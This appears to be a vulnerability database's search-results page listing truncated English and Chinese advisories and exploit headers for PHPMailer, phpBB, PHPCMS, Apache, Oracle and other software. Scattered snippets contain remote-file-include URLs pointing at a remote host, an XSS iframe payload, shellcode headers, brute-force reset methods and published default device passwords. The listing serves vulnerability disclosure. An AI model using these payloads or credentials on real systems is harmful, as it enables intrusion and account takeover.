56796 matches found
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit) (CVE-2016-10045)
The Chinese version of the analysis: http://paper.seebug.org/164/ BACKGROUND "PHPMailer continues to be the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily." http://phpmailer.worxware.com/ "Probably the world's most...
The Microsoft DirectX graphics kernel subsystem elevation of privilege vulnerability MS16-062)
来源: 腾讯科恩实验室官方博客 作者: Daniel King @long123king 如何攻破微软的Edge浏览器 攻破微软的Edge浏览器至少需要包含两方面基本要素:浏览器层面的远程代码执行RCE: Remote Code Execution和浏览器沙箱绕过。 浏览器层面的远程代码执行通常通过利用Javascript脚本的漏洞完成,而浏览器的沙箱绕过则可以有多种方式,比如用户态的逻辑漏洞,以及通过内核漏洞达到本地提权EoP: Escalation of Privilege。...
Himail邮件系统 /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=处文件包含
No description provided by source...
蓝科(lankecms)建站系统 /Eabout.asp 文件 id 参数 SQL注入漏洞
No description provided by source...
bitrix site manager 4.0.5 - Remote File Inclusion Vulnerability
No description provided by source. + Author : Don Tukulesto [email protected] + Date : November 13, 2009 + Homepage : http://www.indonesiancoder.com + Vendor : http://www.bitrixsoft.com/ + Method : Remote File Inclusion + Location : INDONESIA Notes : I know this is an old bugs, but i just...
phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to...
PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit
No description provided by source. ?php / --------------------------------------------------------------- PHPizabi v0.848b C1 HFP1-3 Remote Arbitrary File Upload Exploit --------------------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....:...
PostgreSQL contrib/hstore/hstore_io.c整数溢出漏洞
CVE ID:CVE-2014-2669 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL contrib/hstore/hstoreio.c存在整数溢出,允许远程通过验证的用户使应用程序崩溃。漏洞与hstorerecv, hstorefromarrays和hstorefromarray函数相关。 0 PostgreSQL 9.0.x PostgreSQL 9.1.x PostgreSQL 9.2.x PostgreSQL 9.3.x PostgreSQL...
PHPCMS v9.3.4 content.php SQL注入漏洞
PHPCMS全版本通杀SQL注入漏洞,测试版本为V9.5.3版本,2014-05-12之前的 存在漏洞的文件/phpcms/modules/member/content.php 202行 edit函数 $info = array; foreach$POST'info' as $k=$v ifinarray$k, $fields $POST'info'$k = newhtmlspecialcharstrimscript$v; $POST'linkurl' = strreplacearray'"','','',",",'...
Mozilla Firefox gfxTextRun::ShrinkToLigatureBoundaries堆释放后重用漏洞
BUGTRAQ ID: 57198 CVECAN ID: CVE-2013-0771 Firefox是一款非常流行的开源WEB浏览器。SeaMonkey是开源的Web浏览器、邮件和新闻组客户端、IRC会话客户端和HTML编辑器。Thunderbird是一个邮件客户端,支持IMAP、POP邮件协议以及HTML邮件格式。 Mozilla Firefox 18, ESR 17.0.1的gfxTextRun::ShrinkToLigatureBoundaries内存在堆释放后重用漏洞,可导致远程代码执行。 0 Mozilla Firefox 18.0 Mozilla Firefox ESR...
Apache mod_proxy_http模块超时处理信息泄露漏洞
BUGTRAQ ID: 40827 CVE ID: CVE-2010-2068 Apache HTTP Server是一款流行的Web服务器。 Apache HTTP Server的modproxyhttp模块中的modproxyhttp.c文件没有正确地检测超时,在某些超时情况下服务器可能返回属于其他用户的响应,导致泄漏敏感信息。仅有可触发使用代理worker池的配置才受影响。 Apache 2.2.x 厂商补丁: Apache Group ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Apache mod_proxy_ftp FTP命令注入漏洞
Apache modproxyftp是一款用于处理FTP代理请求的Apache模块。 Apache modproxyftp存在输入验证错误,远程攻击者可以通过在发送给apache服务器的请求中构建特殊的"Authorization"头,可传递FTP命令给FTP服务器。 在通常的情况下,apache modproxyftp不允许发送任意FTP命令给FTP服务器,Apache只发送一些有线的命令给FTP服务器,如USER, PASS, PWD等,modproxyftp存在漏洞允许用户编码任何FTP命令作为"Authorization"头数据,并由apache传递给FTP服务器执行。 Apac...
Radix Antirootkit < 1.0.0.9 (SDTHLPR.sys) Privilege Escalation Exploit
No description provided by source. //////////////////////////////////////////////////////////////////////////////////// // +----------------------------------------------------------------------------+ // // | | // // | Usec.at - http://www.usec.at/ | // // | | // // | Affected Software: | // // ...
SIU Guarani Multiple Remote Vulnerabilities
No description provided by source. multiple remote vulnerabilities siu guarani general information ------------------- bug type : multiple remote vulnerabilities software name : SIU Guarani vendor : SIU www.siu.edu.ar authors : proudhon & Ubik date : the 341st day of the year 2008 contact : N/A...
CVE-2018-1273: RCE with Spring Data Commons
...
Moodle Remote Code Execution Vulnerability (CVE-2017-2641)
The vulnerability CVE-2017-2641 allows an attacker to execute PHP code at the vulnerable Moodle server. This vulnerability actually consists of many small vulnerabilities, as described further in the blog post. Moodle is a very popular learning management system, deployed in many universities...
WebKit memory corruption vulnerability(CVE-2016-4657 )
Can be used for: CVE-2016-4657 Nintendo Switch Node Server Quick node.js server for the WebKit exploit. The virus can be modified in exploit.js Installing and Running cd npm i sudo node server.js Server runs on port 80 needs root unless specified otherwise. Route conntest.nintendowifi.net to your...
Dahan jcms /jcms/jcms_files/jcms1/web1/site/module/comment/opr_ballot. jsp parameters c_uuid time blind
No description provided by source...
EZEIP3.0多页面上传验证漏洞
No description provided by source...
maticsoft Shop商城系统 regionhandle.aspx 参数ParentId SQL注入漏洞
动软商城系统是一套集CMS资讯+独立商城+微信商城+手机APP+SNS用户社区于一体的全新电商营销解决方案。主要为企业树立企业品牌形象,实现独立网络推广,充分利用网站SEO、微博、APP,微信等移动客户端多渠道网络营销手段,为您搭建一个全新的营销渠道。 官方主页: http://www.maticsoft.com/ Google Dork:MaticsoftFK 0x02 漏洞细节 通用注入 http://shop1.maticsoft.cn/regionhandle.aspx 页面中 ParentId 过滤不严,造成post注入 sqlmap过程: Place: POST...
mcms最新版SQL注入2枚打包(可出任意数据)
简要描述: mcms最新版SQL注入6枚打包(可出任意数据) 详细说明: 掌易科技的程序员反应相当快啊,确认漏洞当天就修复以后出新版本了,前面在wooyun提的几个漏洞新版的mcms做了相应的处理,发布了新版v3.1.2.enterprise,再来研究研究。 在文件上传的地方存在过滤不严的情况,前台就有多处可以上传的地方,而且每个上传点都有2个参数存在注入,这里打包提交吧。 下面以用户头象上传点进行说明 注入2枚:/statichttps://images.seebug.org/upload/uploadify.php...
Wordpress Orange Themes CSRF File Upload Vulnerability
No description provided by source. Title : Wordpress Orange Themes CSRF File Upload Vulnerability Author : Jje Incovers Date : 01/12/2013 - 17 November 2013 Category : Web Applications Type : PHP Vendor : http://www.orange-themes.com/ Download : http://www.orange-themes.com/portfolio/ Tested :...
Oracle Forms and Reports 代码执行漏洞
No description provided by source...
大汉通版jis统一身份认证系统漏洞打包
简要描述: 大汉通版jis统一身份认证系统漏洞打包,政府部门使用居多 详细说明: 大汉通版jis统一身份认证系统: 在用户修改信息时进行抓包发现 POST: http://10.11.5.201:9080/jis/front/upduserdo.jsp CONTENT:...
Hudong HDWiki 5.1 URI SQL注入漏洞
hdwiki是互动百科开发的一款免费建站,自助建站程序 HDWIKI V5.0 基本上没有对输入的变量进行过滤,存在多个sql注入漏洞,如发表评论的地方存在代码注入问题 另外HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终获得shell 0 HDWiki 5.1 厂商解决方案 目前没有详细解决方案提供: http://kaiyuan.hudong.com/ POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg,...
ExtMail1.2 邮件系统跨站脚本漏洞(3P)
北洋贱队2009.12.31首发 Extmail 是一个以perl语言编写,面向大容量/ISP级应用,免费的高性能Webmail软件。 最新版本为1.2,检测出三出处跨站漏洞。 1.免费新用户注册的"signup.cgi"对‘domain’参数未进行参数过滤,构建恶意脚本代码作为参数数据,并诱使用户访问恶意链接,可触发恶意脚本代码在目标用户浏览器上执行,导致敏感信息泄漏。 demo:http://demo.extmail.org/extman/cgi/signup.cgi?domain=%22%3E%3Ciframe%20src=http://www.gohack.org%3E...
War3 Jass虚拟机执行任意机器码严重漏洞
Jass正确地说是Jass2是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位Unit, 设置的触发Trigger等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用. Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。 经过推断,CS cstrike可能也存在此类问题。 War3 Jass 暂无 登陆浩方或者VS对战平台,修改某张地图例如DOTA的地图,开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。 set bjmeleeTwinkedHeroes1024 =...
Apache Tomcat表单认证用户名枚举漏洞
BUGTRAQ ID: 35196 CVECAN ID: CVE-2009-0580 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 由于某些认证类中的不充分错误检查,如果远程攻击者向Tomcat服务器提交了非法URL编码的口令就可能通过返回判断是否存在所请求的用户名。如果基于表单的认证(jsecuritycheck)使用了任意以下认证域就可以执行这种攻击: MemoryRealm DataSourceRealm JDBCRealm Apache Group Tomcat 6.0.x Apache Group Tomcat 5.5.x Apache Group...
PHPizabi notepad_body参数SQL注入漏洞
BUGTRAQ ID: 34223 PHPizabi是一款代码开源的在线交友、交流、婚介、商务合作系统。 PHPizabi的/theme/default/proc.inc.php模块中没有正确地验证用户所提交的notepadbody参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。以下是有漏洞的代码段: ?php function bufferProcParse$buffer global $CONF; $tpl = new template; $tpl - LoadThis$buffer; // HANDLE POSTED NOTEPAD DATA \...
Oracle数据库服务器CREATE ANY DIRECTORY权限提升漏洞
BUGTRAQ ID: 31738 Oracle是大型的商用数据库系统。 Oracle数据库中存在严重的权限提升漏洞,拥有CREATE ANY DIRECTORY权限的低权限用户可以通过UTLDIR用已知的二进制口令文件直接覆盖隐藏的口令文件获得SYSDBA权限。 Oracle Database 11g Oracle Database 10.2 Oracle Database 10.1 Oracle ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.oracle.com --note windows add...
PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit
No description provided by source. ?php printr' --------------------------------------------------------------------------- PHPWind = 5.0.1 "AdminUser" blind SQL injection exploit by rgod [email protected] site: http://retrogod.altervista.org dorks: "powered by phpwind" "powered by phpwind v5.0.1"...
OpenPGP、S/MIME information disclosure (CVE-2017-17688,CVE-2017-17689)
EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails. Email is a plaintext communication medium whose communication paths are partly protected by TLS TLS. For people in hostile environments journalists, political...
Apache Struts2 S2-055(CVE-2017-7525)
Summary Vulnerability in the Jackson JSON library | | | | :------------ | :------------ | | Who should read this | All Struts 2 developers and users which are using the REST plugin | | Impact of vulnerability | Not clear, please read the linked issue for more details...
OnePlus 3/3T open up an ADB session without authorization (CVE-2017-5622)
Last month we published CVE-2017-5626 patched in OxygenOS 4.0.2, a vulnerability which allowed attackers to effectively unlock a OnePlus 3/3T device without a factory reset. Combining this with our also discovered CVE-2017-5624 patched in OxygenOS 4.0.3 enabled a powerful attack against locked...
PHPMailer local file read Vulnerability (CVE-2017-5223)
Details source: http://www.freebuf.com/vuls/124820.html Author: Yxlink Affected versions: PHPMailer = 5.2.21 Vulnerability level: High-risk Vulnerability details: Vulnerability file function: class.phpmailer.php the encodeFile function. The function receives a $path variable, and finally the $pat...
ImageMagick 命令执行漏洞 (ImageTragick)
详情来源:CVE-2016-3714 - ImageMagick 命令执行分析 - 乌云知识库 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站: https://imagetragick.com/ ,不得不说,有些外国人蛮会玩的。...
Stulz GmbH Stulz WIB 8000 弱口令
该WEB接口存在3个无需用户名的默认密码且具有不同程度的控制权限。 1. ganymed -- 最高控制权限,管理员权限 2. kallisto -- 中级控制权限, 具有读写权限,仅有信息和操作级别的权限。 3. europa -- 低级别权限,只有读权限,仅有信息和操作级别的权限。 弱口令: ganymed – highest authorization, administrator kallisto – medium authorization, read and write, only levels “Info” and “Operate” europa – lowest...
亿邮邮件系统重置密码问题可暴力破解
简要描述: rt 详细说明: 亿邮邮件系统被广大用户使用,发现在亿邮找回密码处回答问题可暴力破解,如果存在简单问题如:生日?攻击者可通过8为生日字典暴力破解,即可成功重置密码。 漏洞证明: 1、简单重置问题 2、暴力破解 3、重置密码 4、登陆邮箱 img src="https://images.seebug.org/upload/201512/2012113453ba520f33b2e65b1d1cc1ec24d8dac7.jpg" alt="登陆邮...
Metinfo 5.3.1 /login_check.php 注入漏洞
No description provided by source...
Oracle WebLogic SSRF And XSS
CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jspAffected Software: Oracle Fusion Middleware 10.0.2, 10.3.6Oracle WebLogic web server is often both a externally accessible; and b permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be...
金蝶某云服务网站任意用户密码重置漏洞
简要描述: 生活遇到问题,参考人生简单粗暴的四大法则:“不行就分,喜欢就买,多喝点水,重启试试。” 详细说明: http://cs.kdweibo.com/space/c/user/forget-password 金蝶云网站,点击忘记密码,然后可以输入手机号码,输入138 8888 8888 居然存在,然后可以看出是4位验证码 然后就是暴力破解,根据返回长度查看验证码 然后重置成功,就可以用账户登录网站了www.kdweibo.com 各种信息,浏览一下 企业沟通 http://im.kdweibo.com/xtweb/web/login.jsp https://images.seebu...
JetAudio 7.1.9.4030 (.m3u) - Universal Stack Overflow Exploit (SEH)
No description provided by source. !/usr/bin/env python JetAudio 7.1.9.4030 Universal Stack Overflow Exploit SEH Coded By: DrIDE Found By: HACK4LOVE Tested on Windows XP SP2 windows/exec - 303 bytes http://www.metasploit.com Encoder: x86/alphaupper EXITFUNC=seh, CMD=calc sc =...
cmseasy{易通CMS}v5.5最新getshell漏洞
简要描述: 利用该漏洞可以直接上传webshell等恶意文件,危害巨大且目前官方还未出任何补丁,这里做一下简单的漏洞分析。 详细说明: 漏洞利用入口文件位于:editor/editor/dialog/imageusermtmt.php/index.php?case=user&act=log: 通过该页面就可以上传任意文件到服务器了。 看下imageusermtmt.php的代码: $GET=array'case'='user','act'='fckupload'; includeonce...
nginx ngx_http_process_request_headers()函数空指针引用拒绝服务漏洞
BUGTRAQ ID: 36839 CVECAN ID: CVE-2009-3896 nginx是多平台的HTTP服务器和邮件代理服务器。 nginx服务器的src/http/ngxhttpparse.c文件的ngxhttpprocessrequestheaders函数中存在空指针引用错误,远程攻击者可以通过超长的URI来触发这个漏洞,导致worker进程崩溃。 Igor Sysoev nginx 0.8.x Igor Sysoev nginx 0.7.x Igor Sysoev nginx 0.6.x Igor Sysoev nginx 0.5.x Igor Sysoev nginx...
Debian OpenSSH SELinux Privilege Escalation Vulnerability
Debian Linux can be configured to utilize SELinux extensions. OpenSSH may also be configured to utilize SELinux, and to interface with the role-based privilege system. Debian Linux is prone to an SELinux privilege-escalation vulnerability due to a flaw in its OpenSSH package. Specifically, when...
Microsoft消息队列服务栈溢出漏洞(MS07-065)
BUGTRAQ ID: 26797 CVECAN ID: CVE-2007-3039 Microsoft Windows是微软发布的非常流行的操作系统。 Windows的消息队列服务在处理畸形请求数据时存在漏洞,远程攻击者可能利用此漏洞控制服务器。 Windows的消息队列服务在将输入字符串传递到缓冲区之前没有执行正确地验证。具体来讲,漏洞存在于2103端口上所定义的UUID为fdb3a030-065f-11d1-bb9b-00a024ea5525的RPC接口。在处理opnum...
NFN Address Book mosConfig_Absolute_Path远程文件包含漏洞
NFN Address Book是一款基于PHP的WEB应用程序。 NFN Address Book不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'nfnaddressbook.php'脚本对用户提交的mosConfigAbsolutePath'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Mambo NFN Address Book 0.4 Joomla NFN Address Book 0.4 目前没有解决方案提供: http://mamboxchange.com/projects/nfnaddressbook...
ClipShare ADODB-Connection.Inc.PHP远程文件包含漏洞
ClipShare是一款基于PHP的WEB应用程序。 ClipShare不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'ADODB-Connection.Inc.PHP'脚本对用户提交的'cmd'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 ClipShare 1.5.3 目前没有解决方案提供: http://www.clip-share.com/ http://www.example.com/Path/include/adodb-connection.inc.php?cmd=Shell-Attack...
Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
No description provided by source. !/bin/bash $Id: raptorsshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ raptorsshtime - OpenSSH remote timing attack exploit Copyright c 2006 Marco Ivaldi [email protected] OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately sends an erro...
MamboWiki Component MamboLogin.PHP远程文件包含漏洞
MamboWiki是一款基于Mambo的WIKI程序。 MamboWiki不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'MamboLogin.PHP'脚本对用户提交的WEB参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 MamboXChange MamboWiki 0.9.4 暂无 http://www.example.com/sitepath/joomlapath/components/commambowiki/MamboLogin.php?IP=http://www.example.com...